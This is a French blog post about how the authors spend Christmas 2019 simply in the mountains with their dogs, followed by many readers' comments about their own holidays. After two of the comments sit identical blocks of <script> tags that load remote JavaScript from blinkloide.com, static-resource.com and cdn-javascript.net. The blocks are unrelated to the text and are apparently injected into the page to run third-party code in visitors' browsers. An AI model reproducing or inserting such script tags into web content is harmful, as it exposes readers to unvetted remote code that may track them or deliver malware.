-
Noël 2019
Noël est un moment de partage. C'est un temps de bienveillance.
(Empathie disponibilité).
Fête religieuse mais aussi fête de la famille. Il représente l'essence même de l'harmonie familiale.
C'est juste un moment de Bonheur sincère.
Normalement c'est une belle source de revenus pour les commerçants.
Les festivités des uns croisent la misère des autres.La consommation y est excessive. Ce qui m'a toujours fait dire qu'en France Noël était "la fête de la bouffe"
Pour bien du monde un Noël réussit sera basé généralement sur le foie gras, la saumon fumé, les huitres, le boudin blanc le champagne et j'en passe !
Malgré les années qui passent je garde toujours dans mon coeur la douceur des traditions.
Les décorations, les petits biscuits décorés, les chants de Noël.
La joie de partager et d'offrir.Je garde aussi espoir que les choses tristes avec un peu de bon sens, de vouloir et d'affection pourraient s'arranger.
A mon âge, suis-je encore un peu "fleur bleue" ou naïve ?
Oui, très certainement !
Depuis plusieurs années nous fêtons Noël tous les deux en amoureux.
Bien-sûr, nous sommes nostalgiques de l'absence de nos enfants mais c'est la vie et nous n'y pouvons rien.
Lorsque le temps le permet, nous partons en montagne avec Meije et Ilona. Nous pique-niquons dans la neige devant un beau panorama.
Nous n'avons ni foie-gras ni saumon mais notre simple repas dans un décor si beau devient un festin.
Et pour vous que représente Noël ?
Comment le fêtez-vous ?
"Noël n'est ni un jour ni une saison ... c'est un état d'esprit et l'esprit de Noël se trouve dans nos coeurs"
Un doux Noël à chacun de vous.
Elisa et Christian
-
Commentaires
Bonjour Elisa,
Qui seront les plus heureux ? Je me pose la question en te lisant. Moi j'aurais plaisir à voir mes petits-enfants ravis ouvrir les paquets dans de grands cris, enfin juste le temps d'une soirée car à peine quelques jours plus tard ces jouets seront vite oubliés. Quand tu penses que dans des familles on offre… des animaux !
Mais les parents seront ravis, ils auront les yeux scintillants autant que leurs petits. C'est cela Noël chez nous… tant que c'est nous qui ouvrons notre porte.
Je t'ai lue chez moi ma chère Elisa. Je t'ai répondu mais sans doute n'as tu pas vu. Tu as raison et je ne voudrais pas que tu me plaignes, je me sentirais idiote ! Tu sais chez moi je ne peux exprimer ce que je ressens, cela ne se fait pas. Pour les enfants je suis une maman en roc et le peu de larmes que j'ai versées devant eux, ils n'ont pas compris. Alors mon blog m'aide comme une thérapie. On n'est jamais satisfaits je pense de ce qu'on a. Je me satisfaits pourtant de peu car peu me suffit et ma grande maison me semble si vide de sentiments vrais et authentiques.
Vous ne serez que deux et évidemment que le temps des enfants ne peuvent que manquer. Cela nous arrivera certainement un jour mais au final ne vaut-il pas mieux être deux que plusieurs et ressentir un immense malaise de mal-être ?
Mon papa est triste, il regrette le temps où il avait la famille à Noël et pourtant avec ma maman crois moi ce n'était pas facile. Je voulais les inviter mais ils ne vont pas supporter le brouhaha que cause un si grand nombre.
Je te souhaite un merveilleux Noël dans ton paradis auprès de l'homme de ta vie et vos animaux, et après tout c'est très certainement ce qui compte.
Gros bisou
4TitouLundi 23 Décembre 2019 à 07:47Pour nous Noël ce sera un peu comme vous mais pas le même décor, nous sommes à la campagne, on fera une balade si le temps le permet. C'est aussi le premier Noël sans notre Bamboo, dur dur.
On pense aux amis pour qui c'est moins facile en ce moment.
Voilà, le bonheur de fêter Noël tout simplement.
Bonnes fêtes de Noël à tous.
Bisous du Nord5liliLundi 23 Décembre 2019 à 07:56Bonjour Elisa .
Votre Noël est magique.Une année nous avons pu nous évader dans la forêt mais maintenant enfants et petits enfants sont la . Joyeux Noel a vous et encore beaucoup de randonnée sur les beaux sentiers de votre région .
J'ai toujours dit que Noël m'exaspère. çà commence début novembre et j'en ai la nausée.
Même si j'ai tous les enfants cette année, ce qui me comble d'un certain côté, j'avoue que je préfèrerais que Noël soit en été. Alors je crois que les américains du sud ont de la chance !!!
Passer Noël à deux dans la nature est une chose très profonde, alors, même si tu n'as pas tes enfants sache que tu auras la plénitude des montagnes (en espérant que tu n'aies pas ni pluie ni neige tombante).
Gros bisous ma belle !
7elfieLundi 23 Décembre 2019 à 08:41Coucou Elisa,
Tu me connais, je suis un peu comme toi: Toute cette abondance de nourriture ne m'attire guère, mais c'est une tradition, pas que française d'ailleurs, de manger autrement à cette période. Ceci étant, cette année, j'ai invité le 24 au soir, 2 de mes soeurs qui sont seules et mon père, mais il n'y aura pas bombance pour autant; Notre estomac ne le supporte pas!! Et le repas du 25 , qui devrait être sous le soleil, se fera dans la neige, assise sur le sac à dos!!
Joyeux Noel à vous 2 que je souhaite également dans la nature! bisous
Coucou ma belle. Noël a toujours été une fête de famille chez nous mais c'est devenu compliqué. Car il y a des divorces, des enfants ici et là et c'est toujours une prise de tête de savoir qui inviter et qui ne pas inviter pour ne froisser personne. Pendant des années, j'ai passé des fêtes stressantes car je devais jouer de l'orgue et assurer plusieurs services. Maintenant je suis un peu plus tranquille. Cette année, le 24 sera en tout petit comité et le 25, je serai chez mes parents en plus grand comité. Le repas sera simple mais chaleureux. Et ce soir, si j'arrive à finir mon travail à temps, j'irai boire le premier vin chaud de l'Avent sous la neige. Car il neige chez moi! Bises alpines et belles fêtes à toi et ton amoureux!
9Christiane RoddeLundi 23 Décembre 2019 à 09:14Tu as raison Noël doit être avant tout un bonheur partagé et la joie de se retrouver en famille. Malgré l âge encore une fois j ai décoré ma maison intérieur et extérieur et fais min petit sapin. Bien demain soir nous allons partager le repas de Noël préparé ensemble et laisser la magie de Noël agir. Pic nic avec vos chamoiselles suoerbe idée dans ce décor magifique. Joyeux Noël à vous 2 et à vos 4 pattes.10Marie France GarnaudLundi 23 Décembre 2019 à 10:06Bonjour Elisa,je me retrouve dans ta vision de Noël. Pour moi c'est le bonheur, le partage et la magie de cette saison qui met du baume au coeur. Comme toi je pense que j'ai gardé mon âme d'enfant. Tu as la chance d'être dans un lieu propice à cette belle fête de Noël, la montagne et la neige. Je suppose que vos enfants sont loin. Belle fête de Noël à tous les deux. Gros bisous.Comme toi, je suis nostalgique quand il faut fêter Noël. Les vitrines illuminées, alors que certains meurent de froid dans les rues, la razzia dans les magasins, les gros repas de fêtes, cela ne m'a jamais plu ! Depuis l'enfance, j'ai toujours associé Noël à quelque chose de déprimant. Le sentiment aussi de faire beaucoup pour les autres, sans recevoir aucune reconnaissance. Est ce aussi le fait que mon anniversaire, le lendemain de Noël, passe à chaque fois inaperçu, peut être aussi ! Profitez bien tout au long de l'année des petits bonheurs que la vie nous offre, et que tu nous partages, c'est ce qui compte le plus.
Gros bisous à tous les deux.
comme elles sont belles tes boules de noël... pour répondre à ta question pour moi Noël c est la fête du solstice d hiver... la promesse des jours qui vont rallonger d'un nouveau cycle de vie... mon côté vieille druidesse gauloise sans doute... et puis ce pauvre petit jésus n estt même pas né à cette date et je refuse les mensonges des religions.... quant au côté mercantile je n en parle même pas .. bisous et... bon réveillon (ben oui on peut refuser le côté commercial mais être gourmand hi hi hi)
Bonjour Élisa
Comme chaque année, Noël est l'occasion pour moi d'une fête de famille. Je suis habituellement invité par ma fille aînée soit à partager la soirée de réveillon, soit le repas du jour et cette année ce sera le repas du 25, mon autre fille avec ses enfants étant chez les parents de son compagnon. Ce moment de fête est l'occasion de me souvenir des Noëls d'autrefois quand j'habitais Nantes et que mon père rapportait de Vendée une énorrrme brioche vendéenne que ma mère servait au dîner pris très tard avec un savoureux bol de chocolat au lait. Souvenirs et nostalgie du temps qui passe ...
Je vous embrasse tous deux en vous souhaitant une belle journée en montagne puisque la météo annonce du soleil sur la région dignoise.
Coucou l'amie des animaux ! Noël est magique de par ses lumières, ses décos, ses odeurs de cannelle et de vin chaud, de sourires sur les lèvres des enfants, la joie et le bonheur d'attendre le père noël qui apportera les cadeaux, un moment merveilleux sans être croyante j'aime noël même si nous sommes tous les deux aussi cette année (grève oblige pour le train) quelle barbe ces lotis.
Non tu n'es pas naïve mais tu souhaiterais voir la vie autrement tout simplement, par contre on a beau essayé et on n'y arrivera jamais. Profitons des petits moments de bonheur comme les balades dans ta montagne ou moi à la mer, une ressource qui ne s'épuisera jamais dans nos coeurs.
Je reconnais que noël à toujours été un repas d'exception chez nous avec tout ce qui l'entoure comme les ingrédients que tu cites mais je te comprends toi qui ne mange pas tout cela. Mais rien ne m'empêche d'adorer les animaux dont certains je ne peux pas manger comme toi je suppose que tu manges du poisson et pourtant je le considère comme un animal à part entière. J'ai eu un grand aquarium et je pleurais quand j'en retrouvais un sur le dos et j'évite de manger du poisson, hormis saumon et sole... Mais là restera un long débat.
J'adore la photo dans la neige avec tes gros nounours.
Alors je te souhaite un merveilleux réveillon à ta façon et qui sera formidable j'en suis sûre avec ton mari et tes animaux. Bises
15NoiroLundi 23 Décembre 2019 à 10:30Pour ma part ce sera un Noël normal :-D Balade avec mes loustics espérons qu'il y ait un peu de neige mais pas sure, petit repas entre amis et voilà... Joyeuses Fêtes à vous deux et aux poilus bisous TVB
Bonjour Elisa
Oui on se plaint sans arrêt mais quand on voit ce qui se passe dans les magasins en ce moment on peut dire qu'on est vraiment pas malheureux en France (enfin certaines personnes sont surement malheureuses en cette période je n'en doute pas).
Oui une belle source de revenus pour les commerçants qui en profitent au maximum pendant ces 15 derniers jours de l'année.
Bon après chacun fait comme il veut, moi j'aime être en famille et je regrette même que mon fils qui habite dans le sud ne puisse pas venir avec sa petite famille ça va me manquer, mais je suis avec mon autre fils ses enfants et sa belle famille des gens sympas, je pense que nous allons passer un agréable moment. Je crois que vous devez être nostalgique de pas faire Noël avec vos enfants, ça se comprend
Je te souhaite une bonne journée et des bonnes fêtes de fin d'année, bisous Elisa ainsi qu'a Gilbert
17pulsatillaLundi 23 Décembre 2019 à 10:35Bonjour Elisa ,
Tu ne seras pas surprise je crois si je te dis que je partage tout à fait ton analyse de ce qu'est devenu Noël...
Vivant à la campagne et évitant la ville qui ne me tente plus , je suis relativement épargnée par toute cette compétition mercantile !
Et je t'avouerais que pour moi maintenant, c'est le moment où le silence de la maison est particulièrement retentissant , tant de voix se sont tues !
Je te souhaite de tout coeur le Noël que tu aimes .
Bises .
PS: tes boules de Noël sont adorables !
bonjour chers amis, Noel a été un peu dévoyé, je suis bien d'accord avec toi, la fête de la bouffe au reveillon bien souvent ! vous serez tous les deux, nous aussi avec le papa d'Ilona, nous réveillonnerons à deux, le repas de famille sera le 25 sans excès ! dans ma jeunesse je n'ai pas été habitué aux grandes festivités, je ne connaissais pas le père Noel, ni le sapin, les modestes cadeaux c'était le 1er janvier dans notre region ! j'ai 92 ans et je ne suis allé qu'une seule fois dans ma vie à la messe de minuit, de plus c'était pour assister à des chants gregoriens dans un monastère ! à chacun sa vie ! je vous souhaite de bonnes fêtes de Noel et de fin d'année , portez vous bien, amitiés et bises de PPR
Bonjour Elisa,
Ça fait depuis un moment que je ne suis pas venue et je m'en excuse, pour moi Noël c'est entre amis et dans la famille, j'ai du annulé chez les amis suite à des problèmes de santé, j'espère pouvoir aller en famille même si l'ambiance de Noël n'y est plus trop il n'y a plus de sapin ni de décorations c'est un peu triste.
Sinon la veille de Noël mon mari et moi célébrons tous seul avec notre beau sapin et nos décos et ça nous fait du bien !
Je vous souhaite de très bonnes fêtes de Noël, gros gros bisous & à bientôt !
pardon je vous ai pas félicité pour ce bel article, avec les deux superbes boules ! amities et bises
Bonjour Elisa
Noël cette année c'est avec la famille,il y avait bien longtemps que nous l'avions fait avec les enfants,généralement nous fuyons ces jours en partant en voyage . Bonne semaine et bon noël amitiés
Bonjour Elisa,
Comme je te rejoins sur bien des points. Cette année, pas de fête particulière. A deux à la maison. Certes, il y a un sapin décoré, des guirlandes lumineuses à l'extérieur de la maison sous le toit. Et ce seront les seuls rappels de Noël...
Nous laissons les agapes à d'autres.
Alors je ne te souhaite pas un joyeux Noël, mais une bonne communion à deux et plus avec tes amis à quatre pattes devant une nature parfois irréelle mais si belle.
Je t'embrasse.
23LastchanceLundi 23 Décembre 2019 à 11:48Comme toujours, j'ai beaucoup apprécié ton billet. En le lisant, je me suis aperçue qu'au bout du compte, je n'étais pas française! chez nous: pas d'huitres, ni de saumon, ni de champagne et encore moins du foie gras ou du boudin blanc! Je me souviens pourtant que lorsque nous étions petites, nous nous réjouissions du boudin blanc. Autre temps, autre mœurs, toujours est-il que seuls des moments de partage durant ces fêtes me réjouissent. Martine vient juste de partir et nous avons fêté Noël à notre façon : un petit café devant la cheminée! Il faut bien admettre que devant tous ces monticules de nourriture, seul la simplicité nous réchauffe le cœur.
bonjour Elisa , oui pour moi c'est d'abord une fête religieuse , on ira à la messe de minuit , et après un petit repas sympa tous les deux
avec surtout des huitres je suis charentais hi hi et du pineau des charentes et .... hi hi un petit verre de blanc demi sec ! et ++ ,
oui dans la montagne avec les chiennes ça doit être bien aussi !!! profitez en bien ... magnifique le médaillon avec les chiennes ...
belles fêtes de fin d'année gros bisous a+
Bon Noël à vous deux et à tous vos animaux magnifiques ! On aime le fêter le plus simplement possible ce Noël qui vient après un mois d'attente... mais il est certaines contraintes difficiles à éliminer et auxquelles on se plie pour faire plaisir et pour se retrouver avec ceux que l'on aime ...
Noël sera fait à la maison entouré par les gens de j'aime, mes enfants, petits-enfants et mes amis. Un repas un peu plus gourmand, mais sans plus. J'ai le souvenir de mes Noëls d'enfant où j'allais ramasser de la mousse dans les bois et des brins de branches d'arbre pour faire la crèche. De l'amour, de la joie et du plaisir de se retrouver, voilà mon vrai Noël, Elisa. Il va me manquer mes chers disparus, mais je sais qu'ils seront près de nous, dans cet amour que je donne. Je vous souhaite un très doux et très Joyeux Noël. Que l'amour vous accompagne.♥♥♥
27KimcatLundi 23 Décembre 2019 à 14:3628ChamoiseLundi 23 Décembre 2019 à 15:34Elisa,je suis dans la locomotive cette fois!sachant que je "triche" car j'ai le wagon "Melan "qui attend on commentaire! Mais comme celui ci évoque Noël et bien je viens te dire comme ce que tu écris est écho à ce que je ressens..Devrions plus célébrer l'hiver que Noël? C'est la question que je me pose chaque année..Je ne sais car Noël est une fête symbolique religieusement et j'ai vécu des temps de Noël inoubliables et les plus beaux quand je vivais proche du Couvent des Soeurs martiniquaises dominicaines,des chants magnifiques dans la chapelle,des rires,de la douceur,de la chaleur,du houx sur la table,des mets simples mais cuisinés avec amour..Des offrandes simples..Une crèche sublime..
Comme beaucoup de fêtes il est devenu le synonyme de sur consommation,de sur publicité,de sur argent etc etc..Et tout cela m'effarie,me fait fuir,sauvage que je suis et amoureuse de la simplicité et de la nature..
Alors mon Noël sera proche du vôtre,même si je ne peux toujours pas marcher comme je le veux car après le tendon du pied droit,voilà que depuis une semaine j'ai une fratcture de fatigue (je ne connaissais pas ce terme) du pied gauche et c'est juste trèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèès douloureux,me chausser est un cri! Mais avec Cybèle nous monterons un peu,nous irons nourrir notre famille chats à a grange,nous porterons des carottes à nos amis les poneys Flocon et Charlotte,nous irons faire quelques pas dans la neige et dans le sac à dos il y aura un petit thermos de thé, un petit pain avec du chocolat,une clémentine et une banane et une"friandise" pour Cybèle..Et nous serons libres et heureuses loin de l'agitation et puis nous retrouverons nos 8 amis chats ici au chaud avant de se glisser dans le lit avec un livre..
Je t'embrasse Elisa ainsi que Christian, Ilona,Meije,Jazz,Jaya,Les Perruches, Amandine,Victoire,le Jardin,la Véranda fleurie,les Tourterelles,les Oiseaux..
Vivez un beau Noël amoureux.
BONJOUR
Noël ! c'était une fête familial ....la messe de minuit dans ma jeunesse ! mais c'est fini tout ça pour moi
mon mari ou mon fils ,il y en avait toujours un qui était de service se jour la (pompier ) une nuit chargée pour eux
et maintenant c'est ma belle fille qui travail le 24 et le 25 (chez les handicapés )
bof on trouvera le temps de se faire plaisir quand même
passe des bonnes toi et famille gros bisous
Jolies les deux petites boules de Noël, très originales et certainement très rares ! Bravo pour le montages photo !
En ce qui concerne Noël... Au plus loin que je me souvienne dans ma vie, cela représente déjà, la naissance de Jésus, les messes de minuit, les scintillements des guirlandes et des sapins enluminés et dans les yeux des enfants émerveillés, qui attendent avec impatience d'ouvrir leurs paquets cadeaux ! C'est un peu leur FÊTE, la fête des enfants de ce Monde C'est beaucoup de lumières dans la période la plus sombre de l'Année... Une tradition qu'on ne doit pas perdre absolument... ça fait partie du patrimoine de notre civilisation... et, quand c'est possible, de se retrouver autour d'un sapin en famille en festoyant... Maintenant, en ce qui concerne les dépenses et la surconsommation, je pense qu'elles se font maintenant tout au long de l'Année, à n'importe quelle occasion ! Et on peut se dire : Qu'on a qu'une vie, et qu'on emmène rien au Paradis !
BONNES FÊTES DE NOËL et de fin D'Année
Ami Gilbert d'Ahuy
31Golondrina63AuvLundi 23 Décembre 2019 à 15:57C'est toute l'année que je suis bienveillante
Cela dit je suis aussi réaliste
NOël n'est pas comme avant
Noël est devenu bien trop commercial
Mais chez moi j'essais autant que faire se peut d'être la même
Bon Noël à toi et avec ceux que tu aimes
Merci pour tes photos rayonnantes de beauté
Nous aussi depuis quelques années nous célébrons Noël tous les deux ma fille étant au loin avec ses deux enfants et Noël sans enfants c'est comme du champagne sans bulles! Alors, soudainement Noël est devenue une journée comme les autres...Joyeux noël à vous deux, embrassez vos toutous pour moi!
Je suis tout à fait en accord avec ta vision de Noël...
Sans être pour autant égoïste...j'aimerais passer un Noël à deux en montagne....
Un repas tout simple, juste la magie des lieux pour décor....
Mais bon.....
Bonnes journées avec ton chéri et tes deux toutous !
Grosses bises
bjr Elisa, Noël représente pour moi le partage, une fête familiale avec mes enfants et ma maman autour d'un repas simple mais élaboré avec amour .
Très sympa ces deux boules photos.
Bon Noël à vous deux. Muxu
36naysLundi 23 Décembre 2019 à 18:03bonsoir Elisa
pour nous Noel sera une soirée comme une autre a nous deux mais sans aucune nostalgie, je garde les souvenirs de Noel petite fille que j'étais....
Noel ne représente rien pour nous et certainement pas de la bouffe..comme tous les soirs souper a 18H30 avec les ingrédients habituels, saucisses végétales hamburger végétal etc..puis TV film ou série puis 22H25 au dodo comme d'hab ☺
voilà tu sais tout
mais je respecte bien sûr et je vous souhaite une belle soirée en amoureux auprès de vos chéris ♥♥bisous la tribu ♥♥
Noël une fête familiale...Élisa
nous recevons les enfants et le petits enfants...
c'est également la fête du solstice de l'hiver...et de la commerce
je vous souhaite un bon Noël et à ceux que tu aimes
Willy
Très JOYEUX NOEL à vous deux. Je vous souhaite une très jolie balade avec les Miss.
Pour moi ce sera tout simple avec ceux que j'aime...
Bien qu'ici on en mange la moitié de l'année, des huîtres seront au menu tout simplement parce que nous aimons bien
et une bûche maison, c'est la tradition !!!
Gros bisous
Joyeux Noël à vous deux. Pour nous, pas de réveillon, avant, nous allions Pierre et moi,dans un monastère de soeurs contemplatives, pour écouter leurs chants, et la messe de minuit. elles dans leur "enclos" nous dans l'église, ensuite nous allions tous vers la crèche, et quelques novices venaient nous parler, on sentait une certaine nostalgie chez elles malgré tout. Il nous arrivait de rester encore 30 minutes à chanter tous ensemble des chants de Noël une ou deux seurs entamaient une chanson religieuse ou de Noël, tout le monde reprenait, la mère supérieure était tolérante tout au moins ce soir là. Depuis deux années, nous n'avons plus envie de sortir la nuit, traverser les bois alors nous restons à la maison.
Le jour de Noël, oui nous faisons la fête, nous nous retrouvons chez la soeur de Pierre. Gros bisous. FRANCOISE
Mon grand-père adorait noël (j’ai de merveilleux souvenirs d’enfance), mon père adorait noël (depuis quinze ans il me manque) mais je ne suis pas à plaindre j’ai la chance de faire noël et jour de l’an avec mes enfants et petits enfants et ma maman, on est très éparpillés tout au long de l’année mais pour ces deux fêtes nous restons ensemble. Avant ça se passait chez nous car nous pouvions coucher tout le monde depuis que nous avons un plus petit appartement ça se passe chez eux.... Depuis que mon fils aîné est marié, une année il est avec nous à noël une autre au jour de l’an et inversement avec ses beaux parents en Bretagne. Mon autre fils , sa belle famille étant en Tunisie, nous passons les deux fêtes ensemble.
Pour la nourriture, bien sûr nous améliorons mais avec le plaisir de faire nous même la plupart des plats. Pour les cadeaux comme j’ai déjà dit sur mon blog nous faisons tous des listes ainsi c’est la surprise car on ne sait pas quelle chose sera choisi mais c’est forcément quelque chose qui nous fait plaisir et dont on a besoin.
Ma hantise est qu’un jour cet équilibre s’arrête, pour moi noël me tient tellement à coeur que je rebondirai d’une façon où d’une autre. Il y a déjà eu des cassures, pendant quinze ans on a fait noël et jour de l’an à Bonneval-sur-Arc, mon frère et sa petite famille ont pris un autre chemin et il a fallut faire autrement alors je sais qu’un jour de nouveau ça changera.
Je te souhaite de bonnes fêtes Elisa en amoureux avec la beauté du paysage même si je me doute que tu dois avoir un petit pincement au coeur de savoir les tiens éloignés. Je t’embrasse chaleureusement. Aline
41Twiggy 62Lundi 23 Décembre 2019 à 23:25Bonsoir Elisa,
Deux très belles cartes de voeux, pleines de douceur et de tendresse.
Je suis bien d'accord avec toi, Noël est devenue une journée festive, loin de sa signification première. Personnellement, j'ai la nostalgie des Noël de mon enfance où, après un repas tout simple, nous nous rendions à la messe de minuit, à pied et généralement dans la neige. Nous rencontrions du monde sur la route car personne n'avait de voiture. Les gens se parlaient. Au retour, nous trouvions quelques modestes cadeaux au pied du sapin. C'était le bonheur. Mais tout cela a bien évolué.
Bien que notre fils réside maintenant près de chez nous, il ne sera pas présent le jour de Noël car il est descendu en Haute Savoie pour partager cette fête avec la famille de sa compagne (je trouve cela tout à fait normal), nous ne serons donc que 5 avec ma maman (94 ans), notre fille et son petit Nathan. Même si, à 10 mois, il ne comprend pas encore, il va apporter beaucoup de joie à cette journée. En outre, je me dis que c'est une sacrée chance de pouvoir réunir 4 générations autour d'un repas, certes amélioré, mais sans trop de faste. En revanche, nous serons tous réunis le jour de la nouvelle année.
Dans notre région humide et venteuse, il ne serait pas possible de programmer un pique-nique à l'extérieur à cette époque de l'année. Cela n'aurait pas du tout le charme d'une pente enneigée, réchauffée par la réverbération des rayons du soleil.
Je vous souhaite, à Christian et à toi-même, un très bon Noël. J'espère qu'une météo clémente sera au rendez-vous et vous permettra de partager cette journée en altitude avec vos compagnes à 4 pattes.
42mimiclapsMardi 24 Décembre 2019 à 00:33Bonjour Elisa,
Merci pour tes passages si réguliers et toujours chaleureux sur le blog!
Je vous souhaite un bon Noël, dans la lumière de la montagne avec vos amies quadrupèdes.
Noël a bien changé depuis mon enfance où souvent les seuls cadeaux étaient "faits maison" et ce sont eux qui m'ont enchantés longtemps.
J'apprécie le fait de vivre à deux, dans un lieu qui me plaît et entourée d'une petite vie "nature" que j'essaie de préserver!
Belles journées d'hiver à toi, ton époux et à ceux dont vous vous occupez avec autant de bonheur!
Belles fêtes de fin d'année, joyeux Noël dans la beauté du monde, dans la nature encore "naturelle". Un pique-nique dans la neige est un moment sublime, vivre l'immaculé paysage est un beau cadeau du ciel.
Pour nous un diner de Noël avec enfants et petits enfants, 11 personnes réunies autour d'un diner sans foie gras, dans un décor que l'on a fait un peu pimpant pour l'occasion... À l'année prochaine Elisa, des bises étoilées vers toi. brigitte
oh oui Noël est un état d'esprit, pas besoin d'un grand repas, la joie d'être ensemble quand cela est possible. joyeux noël avec tes boules de poil et profite bien de ce panorama qui me manquera ici. bises.celine
Coucou mon amie Élisa . Je viens de boire tes jolis mots de présentation de cette fête de Noël et je les comprends plutôt deux fois qu'une . Le notre mon épouse et moi sera et tu sais pourquoi assez bref mais en amoureux comme toutes les années avec un grand + car c'est la voix de mon coeur qui parle + encore cette année . Merci de ta gentille visite qui m'a beaucoup touché Merci . Très jolis tes montages photos . Joeux Noël à vous deux et caresses à Meije et Ilona . Gros bisous mon amie .
Bonne veillée de Noël
<script src="//blinkloide.com/221e5645d998d5ae68.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8734x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8734x&format=arrjs&r=1577211929482" type="text/javascript"></script> <script src="http://blinkloide.com/ext/221e5645d998d5ae68.js?sid=52624_8734_&title=q&blocks[]=31af2" type="text/javascript"></script>Joyeux noel à toi et ta tribu , ta façon de voir noel et de le vivre en montagne est exactement ma façon de le voir bon moi je le passe à l Hopital car c est mon travail et j essaie de donner un peu d espoir et de joie au malades dont je m occupe qui souffre pour beaucoup d AVC
continue à me faire rêvé avec tes beaux paysages . BecsElisa,
Magnifiques tes photos et ta définition de Noel.
Ici, en Champagne , notre Noel est authentique et en toute simplicité mais une chose est sûre, l'esprit de Noel (bonheur, générosité, disponibilité, bienveillance) est bien dans notre foyer.
Joyeux Noel Elisa et Christian
petit passage éclair pour te souhaiter un très joyeux Noël ainsi qu à toute la smala je compte sur toi pour les caresses et les bisous... et... gros bisous à toi aussi bien sûr...
Bonjour à vous en ce 26 Décembre.
Merci pour vos commentaires, j'ai aimé votre spontanéité à me décrire votre Noël. Avec franchise vous avez mis quelques lignes me disant votre façon de vivre cette Fête que l'on dit la plus belle de l'année.On enlève souvent le sens aux Fêtes. On oublie ce qu'elles signifient et on a l'impression que les gens ont perdu le bon sens au profit de la consommation excessive.
Pour certains et pour beaucoup fort heureusement, Noël est une fête de famille. Pour d'autres c'est une fête religieuse et d'autres encore c'est un tête à tête avec son conjoint ou ses proches, voire même seul.
Cette Fête est parfois difficile à vivre car les êtres chers partis sont une déchirure ..... Puis, le marketing veut nous faire croire que tout est réjouissances, bonheur dans la surconsommation.
La Fête de Noël trouve son origine dans la Rome antique. Ces derniers célébraient le solstice d'hiver entre le 23 et 25 Décembre (les jours rallongent à partir de cette période). Ce n'est que plusieurs siècle après Jésus Christ que l'église décide d'associer cette date à celle de la naissance du Christ.
En fait Noël est avant TOUT, la fête du Nouvel Hiver !
Bien que nous nous réunissions tout au long de l'année pour faire des repas de famille, nous ne dérogeons pas à partager Noël de la même façon.
L'un de mes neveux ayant une petite amie, une année sur deux, ils ne sont pas avec nous. Eh bien, ces années-là, nous "re-faisons Noël" après. Cette année, nous récidivons donc le 28 décembre.
Nous ne sommes que 9 au total. Peut-être est-ce pour cela que c'est plus facile ?
En tout cas, petits et grands sont heureux de ces moments de partage et de bonne humeur.
Outre tout ce que tu cites, Noël est aussi ce que chacun en fait, pour lui, mais aussi avec et pour les autres. Que cette année que tu termines dans la nature te permette d'aborder la suivante avec autant de bonheur.
Noël chez nous est toujours simple
cette année nous l'avons fêté le 23 avec les enfants, chacun de nos trois enfants à apporter un plat à partager...
nous sommes maintenant 14 et sommes heureux de nous retrouver....
Le 24 et 25 nous étions seuls face à notre cheminée où brûlait une grosse bûche...
Veillée lecture...et nous avons regardé nos albums de voyage
<script src="//blinkloide.com/221e5645d998d5ae68.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8734x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8734x&format=arrjs&r=1577433556965" type="text/javascript"></script> <script src="http://blinkloide.com/ext/221e5645d998d5ae68.js?sid=52624_8734_&title=q&blocks[]=31af2" type="text/javascript"></script>Bonjour Élisa, je ressens l'ambiance de Noël avec beaucoup de respects que ça soit envers les personnes qu'on aime (un peu plus que l'année en cours) et en restant humble. J'aime beaucoup cette ambiance mais celle-ci est un peu gâchée par ce profit qui "ronge" un peu plus cette société que je nommerai corrompue.
Mais les fêtes sont surtout une ambiance unique que j'aime particulièrement, j'aime énormément quand elle commence, un peu moins quand ça se termine.
Tu n'es pas naïve c'est juste que l'espoir est en nous, le temps fait les choses...
Je te souhaite une très bonne fin d'année avec beaucoup d'Amour même si il manque de la Famille.
Je t'embrasse et à très bientôt Élisa.
Suivre le flux RSS des commentaires
Ajouter un commentaire
Bien chère Elisa,
Noël c'est l'amour et la lumière.
Elisa et Christian OUI vous avez raison, et c'est très bien ainsi !
Puisse le meilleur vous être offert et que le pire vous soit épargné tout au long de cette future nouvelle année !
Plein de bonheur pour vous , Meije, Ilona, les minou, les pénants et les " dormeuses " qui attendent le printemps tout comme nous ;-)
Amitiés et Gros Bisous